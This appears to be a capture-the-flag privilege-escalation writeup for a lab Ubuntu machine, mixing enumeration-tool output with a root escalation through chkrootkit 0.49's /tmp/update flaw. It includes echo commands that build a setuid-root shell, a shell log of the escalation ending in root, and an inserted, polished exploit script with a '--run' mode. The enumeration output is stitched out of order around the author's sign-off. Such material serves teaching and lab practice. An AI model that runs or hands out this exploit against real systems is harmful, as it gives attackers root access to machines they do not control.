lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Feb 3 2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1293 Jul 26 2012 killprocs
-rwxr-xr-x 1 root root 2545 Aug 19 2010 lighttpd
lrwxrwxrwx 1 root root 21 Nov 20 2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2797 Feb 13 2012 networking
-rwxr-xr-x 1 root root 882 Jul 26 2012 ondemand
lrwxrwxrwx 1 root root 21 Sep 12 2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns
lrwxrwxrwx 1 root root 21 Oct 28 2013 procps -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 8635 Jul 26 2012 rc
-rwxr-xr-x 1 root root 801 Jul 26 2012 rc.local
-rwxr-xr-x 1 root root 117 Jul 26 2012 rcS
-rwxr-xr-x 1 root root 639 Jul 26 2012 reboot
lrwxrwxrwx 1 root root 21 Sep 8 2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync
lrwxrwxrwx 1 root root 21 Nov 26 2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4321 Jul 26 2012 sendsigs
lrwxrwxrwx 1 root root 21 Apr 19 2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 590 Jul 26 2012 single
-rw-r--r-- 1 root root 4304 Jul 26 2012 skeleton
-rwxr-xr-x 1 root root 4371 Jan 13 2016 ssh
-rwxr-xr-x 1 root root 567 Jul 26 2012 stop-bootlogd
-rwxr-xr-x 1 root root 1143 Jul 26 2012 stop-bootlogd-single
-rwxr-xr-x 1 root root 700 May 23 2012 sudo
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Apr 5 2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2800 Jul 26 2012 umountfs
-rwxr-xr-x 1 root root 2211 Jul 26 2012 umountnfs.sh
-rwxr-xr-x 1 root root 2926 Jul 26 2012 umountroot
-rwxr-xr-x 1 root root 1985 Jul 26 2012 urandom
### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1
### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
Installed compilers:
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler
Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12 2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30 2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30 2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25 2016 /etc/shadow
Can't search *.conf files as no keyword was entered
Can't search *.log files as no keyword was entered
Can't search *.ini files as no keyword was entered
All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30 2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30 2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30 2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19 2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16 2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep 5 2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May 2 2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12 2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30 2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30 2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30 2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf
Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 30 2016 .
drwxr-xr-x 12 root root 4096 Apr 26 2016 ..
### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$
dpkg -l | grep chkrootkit
rc chkrootkit 0.49-4ubuntu1.1 rootkit detector
echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c
echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update
gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]
www-data@ubuntu:/tmp$ run-parts
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
-rwxr-xr-x 1 www-data www-data 40155 Jan 5 09:42 1.sh
-rw-r--r-- 1 www-data www-data 40155 Jan 5 09:43 2.py
-rw-r--r-- 1 www-data www-data 36801 Jan 5 09:43 3.sh
-rw-r--r-- 1 www-data www-data 5123 Jan 5 09:48 37292.c
drwxrwxrwt 2 root root 4096 Jan 5 09:41 VMwareDnD
srwxr-xr-x 1 www-data www-data 0 Jan 5 09:41 php.socket-0
-rwsrwxrwx 1 root root 7235 Jan 5 09:59 test
-rw-rw-rw- 1 www-data www-data 69 Jan 5 09:56 test.c
-rw-rw-rw- 1 www-data www-data 2 Jan 5 09:55 test.cls
-rwxrwxrwx 1 www-data www-data 74 Jan 5 09:57 update
-rw-rw-rw- 1 www-data www-data 20 Jan 5 09:56 updatels
-rw-r--r-- 1 root root 1600 Jan 5 09:41 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 5 09:41 vmware-root
www-data@ubuntu:/tmp$ ./test
./test
whoami
root
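The escalation above, as an added example that is not part of the original writeup. What the transcript relies on is that chkrootkit 0.49 executes /tmp/update as root when that file exists (CVE-2014-0476, an unquoted assignment in its slapper() function, fixed in 0.50) and that /etc/cron.daily/chkrootkit runs it as root. The job fired within minutes of the payload being dropped here, most likely anacron catching up the missed daily run after the 09:41 boot; otherwise expect to wait for the 06:25 slot in /etc/crontab. The script below packages the same steps with the checks worth doing first: the dpkg state "rc" above means the Ubuntu package was removed with only its config left, so the installed chkrootkit script is located and grepped for the vulnerable line instead of trusting a package version (a distro can also backport the fix under a 0.49 version string). The C source is the transcript's with the include and NULL sentinel the compiler warned about, chown runs before chmod u+s because changing the owner clears the setuid bit, and umask is set to 022 because the transcript's umask 0000 left /tmp/test world-writable and setuid root (-rwsrwxrwx), which anyone on the box could overwrite. /tmp/update and /tmp/test are the writeup's paths; the function names, the RUN_DAILY check against /etc/chkrootkit.conf and the polling loop are this example's, and run_exploit only runs when the script is invoked with --run on the target.

```shell
#!/bin/sh
# Added example, not from the original writeup: the chkrootkit cron-job
# escalation with the checks worth doing first. chkrootkit before 0.50 runs
# /tmp/update as root when it exists (CVE-2014-0476, unquoted assignment in
# slapper()); /etc/cron.daily/chkrootkit runs chkrootkit as root. Function
# names and checks are this example's; /tmp/update and /tmp/test are the
# writeup's paths.

# chkrootkit_vulnerable VERSION: succeed when the upstream version is below
# 0.50. A distro can backport the fix under a 0.49 version string, so treat
# this as a hint and confirm with has_unquoted_update.
chkrootkit_vulnerable() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%[!0-9]*}
    if [ "${major:-1}" -eq 0 ] && [ "${minor:-0}" -lt 50 ]; then
        return 0
    fi
    return 1
}

# has_unquoted_update SCRIPT: succeed when SCRIPT still has the vulnerable
# line "file_port=$file_port $i" from slapper(); 0.50 quotes the assignment.
has_unquoted_update() {
    grep -q 'file_port=\$file_port \$i' "$1"
}

# write_payload DIR: drop the setuid-shell source and the "update" script
# into DIR. The real run must use /tmp, the only place chkrootkit looks.
# chown precedes chmod u+s because changing the owner clears the setuid bit.
write_payload() {
    dir=$1
    cat > "$dir/test.c" <<'EOF'
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    /* set real and effective ids to root, then replace ourselves with a shell */
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setuid");
        return 1;
    }
    execl("/bin/sh", "sh", (char *)NULL);   /* NULL ends the argument list */
    perror("execl");
    return 1;
}
EOF
    cat > "$dir/update" <<EOF
#!/bin/sh
chown root:root $dir/test
chmod u+s $dir/test
EOF
    chmod 755 "$dir/update"
}

# run_exploit: check the preconditions, drop the payload, wait for the job.
# Needs gcc (present on this box) and GNU stat. Only runs with --run.
run_exploit() {
    script=$(command -v chkrootkit || true)
    [ -n "$script" ] || { echo "chkrootkit not on PATH (dpkg 'rc' = package removed, config left)" >&2; return 1; }
    has_unquoted_update "$script" || { echo "$script already quotes file_port: not vulnerable" >&2; return 1; }
    [ -x /etc/cron.daily/chkrootkit ] || { echo "no /etc/cron.daily/chkrootkit job" >&2; return 1; }
    grep -Eq '^RUN_DAILY="?true"?' /etc/chkrootkit.conf 2>/dev/null \
        || echo "warning: RUN_DAILY is not \"true\" in /etc/chkrootkit.conf; the daily job will skip the scan" >&2
    umask 022                      # the transcript's umask 0000 left /tmp/test world-writable
    write_payload /tmp
    gcc -o /tmp/test /tmp/test.c
    echo "waiting for cron (or anacron after boot) to run chkrootkit as root..."
    until [ -u /tmp/test ] && [ "$(stat -c %u /tmp/test)" = 0 ]; do
        sleep 30
    done
    exec /tmp/test
}

if [ "${1:-}" = "--run" ]; then
    run_exploit
fi
```

Copy the script to the target and run `sh exploit.sh --run` from the www-data shell; it refuses to proceed when the installed chkrootkit already quotes the assignment or the cron job is missing, and otherwise blocks until /tmp/test is root-owned and setuid before executing it.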
Regards,
Yuriy Stanchev/URIX
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
Super user account(s):
root
Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 30 2016 .
drwxr-xr-x 22 root root 4.0K Mar 30 2016 ..
drwxr-xr-x 3 john john 4.0K Apr 12 2016 john
Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin
Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Current umask value:
0000
u=rwx,g=rwx,o=rwx
umask value as specified in /etc/login.defs:
UMASK 022
Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 730 Sep 13 2013 apt-xapian-index
-rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:98:f5:19
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:268 errors:0 dropped:0 overruns:0 frame:0
TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:142432 (142.4 KB) TX bytes:22042 (22.0 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Nameserver(s):
nameserver 192.168.1.1
Default route:
default 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.9:56045 192.168.1.20:443 ESTABLISHED 984/php-cgi
tcp 0 0 192.168.1.9:80 192.168.1.20:48676 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:68 0.0.0.0:* -
### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.5 0.1 3396 1832 ? Ss 09:41 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:41 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:41 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:0]
root 5 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/0:0H]
root 6 0.1 0.0 0 0 ? S 09:41 0:00 [kworker/u16:0]
root 7 0.0 0.0 0 0 ? S 09:41 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 09:41 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 09:41 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 09:41 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 09:41 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 09:41 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 09:41 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 09:41 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 09:41 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 09:41 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 09:41 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 09:41 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 09:41 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 09:41 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 09:41 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 09:41 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 09:41 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 09:41 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 09:41 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 09:41 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 09:41 0:00 [kthrotld]
root 44 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:1]
root 45 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_1]
root 47 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:2]
root 48 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:3]
root 49 0.0 0.0 0 0 ? S< 09:41 0:00 [dm_bufio_cache]
root 50 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:4]
root 69 0.0 0.0 0 0 ? S< 09:41 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 09:41 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:2]
root 193 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt_poll_0]
root 208 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt/0]
root 220 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_2]
root 221 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_3]
root 227 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_4]
root 229 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_5]
root 231 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_6]
root 232 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_7]
root 233 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_8]
root 234 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_9]
root 237 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_10]
root 238 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_11]
root 239 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_12]
root 240 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_13]
root 241 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_14]
root 242 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_15]
root 243 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_16]
root 244 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_17]
root 245 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_18]
root 246 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_19]
root 247 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_20]
root 248 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_21]
root 249 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_22]
root 250 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_23]
root 251 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_24]
root 252 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_25]
root 253 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_26]
root 254 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_27]
root 255 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_28]
root 256 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_29]
root 257 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_30]
root 258 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_31]
root 259 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:5]
root 260 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:6]
root 261 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:7]
root 262 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:8]
root 263 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:9]
root 264 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:10]
root 265 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:11]
root 266 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:12]
root 267 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:13]
root 268 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:14]
root 269 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:15]
root 270 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:16]
root 271 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:17]
root 272 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:18]
root 273 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:19]
root 274 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:20]
root 275 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:21]
root 276 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:22]
root 277 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:23]
root 278 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:24]
root 279 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:25]
root 280 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:26]
root 281 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:27]
root 282 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:28]
root 283 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:29]
root 284 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:30]
root 285 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:31]
root 286 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_32]
root 287 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:32]
root 379 0.0 0.0 0 0 ? S 09:41 0:00 [jbd2/sda1-8]
root 380 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-rsv-conver]
root 381 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-unrsv-conv]
root 469 0.0 0.0 2832 608 ? S 09:41 0:00 upstart-udev-bridge --daemon
root 471 0.0 0.1 3080 1296 ? Ss 09:41 0:00 /sbin/udevd --daemon
102 547 0.0 0.0 3256 652 ? Ss 09:41 0:00 dbus-daemon --system --fork --activation=upstart
syslog 557 0.1 0.1 30036 1472 ? Sl 09:41 0:00 rsyslogd -c5
root 622 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 623 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 642 0.0 0.0 0 0 ? S< 09:41 0:00 [ttm_swap]
root 706 0.0 0.0 0 0 ? S< 09:41 0:00 [kpsmoused]
root 752 0.0 0.0 2844 348 ? S 09:41 0:00 upstart-socket-bridge --daemon
root 797 0.0 0.0 2924 404 ? Ss 09:41 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 819 0.0 0.2 6680 2400 ? Ss 09:41 0:00 /usr/sbin/sshd -D
root 899 0.0 0.0 4628 840 tty4 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty4
root 903 0.0 0.0 4628 836 tty5 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty5
root 907 0.0 0.0 4628 844 tty2 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty2
root 908 0.0 0.0 4628 832 tty3 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty3
root 912 0.0 0.0 4628 836 tty6 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty6
root 920 0.0 0.0 2616 884 ? Ss 09:41 0:00 cron
daemon 921 0.0 0.0 2468 348 ? Ss 09:41 0:00 atd
www-data 966 0.0 0.2 8272 2236 ? S 09:41 0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data 968 0.0 0.4 17844 4720 ? Ss 09:41 0:00 /usr/bin/php-cgi
www-data 982 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 983 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 984 0.0 0.2 18100 3072 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 985 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
root 1003 0.0 0.0 4628 836 tty1 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty1
root 1187 0.0 0.0 22584 564 ? Ssl 09:41 0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root 1206 0.1 0.5 11268 5660 ? S 09:41 0:00 /usr/sbin/vmtoolsd
root 1230 0.0 0.7 14736 7840 ? S 09:41 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data 1243 0.0 0.0 2232 544 ? S 09:41 0:00 sh -c uname -a; w; id; /bin/bash -i
www-data 1247 0.0 0.1 3448 1708 ? S 09:41 0:00 /bin/bash -i
www-data 3185 0.2 0.1 3412 1428 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3467 0.0 0.0 3384 644 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3468 0.0 0.1 2860 1032 ? R 09:43 0:00 ps aux
Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28 2013 /bin/bash
-rwxr-xr-x 2 root root 26696 Mar 29 2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18 2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19 2013 /sbin/udevd
lrwxrwxrwx 1 root root 25 Apr 12 2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20 2011 /usr/sbin/lighttpd
